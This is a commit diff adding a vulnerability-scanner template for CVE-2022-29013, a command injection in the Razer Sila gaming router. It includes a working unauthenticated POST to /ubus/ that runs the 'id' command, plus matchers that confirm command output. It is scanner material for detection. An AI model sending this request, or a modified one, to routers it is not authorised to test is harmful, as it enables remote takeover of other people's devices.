Create CVE-2022-29013.yaml

http/cves/2022/CVE-2022-29013.yaml

@@ -0,0 +1,51 @@
+id: CVE-2022-29013
+
+info:
+  name: Razer Sila Gaming Router - Remote Code Execution
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    A command injection in the command parameter of Razer Sila Gaming Router v2.0.441_api-2.0.418 allows attackers to execute arbitrary commands via a crafted POST request.
+  reference:
+    - https://packetstormsecurity.com/files/166684/Razer-Sila-2.0.418-Command-Injection.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29013
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-29013
+    cwe-id: CWE-78
+    epss-score: 0.83254
+    epss-percentile: 0.98361
+    cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:*
+  metadata:
+    max-request: 1
+    vendor: razer
+    product: sila_firmware
+  tags: packetstorm,cve,cve2022,razer,sila,router
+
+http:
+  - method: POST
+    path:
+      - "{{BaseURL}}/ubus/"
+    headers:
+      Origin: "{{RootURL}}"
+      Referer: "{{ROotURL}}"
+      X-Requested-With: XMLHttpRequest
+    body: |
+      {"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)'
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200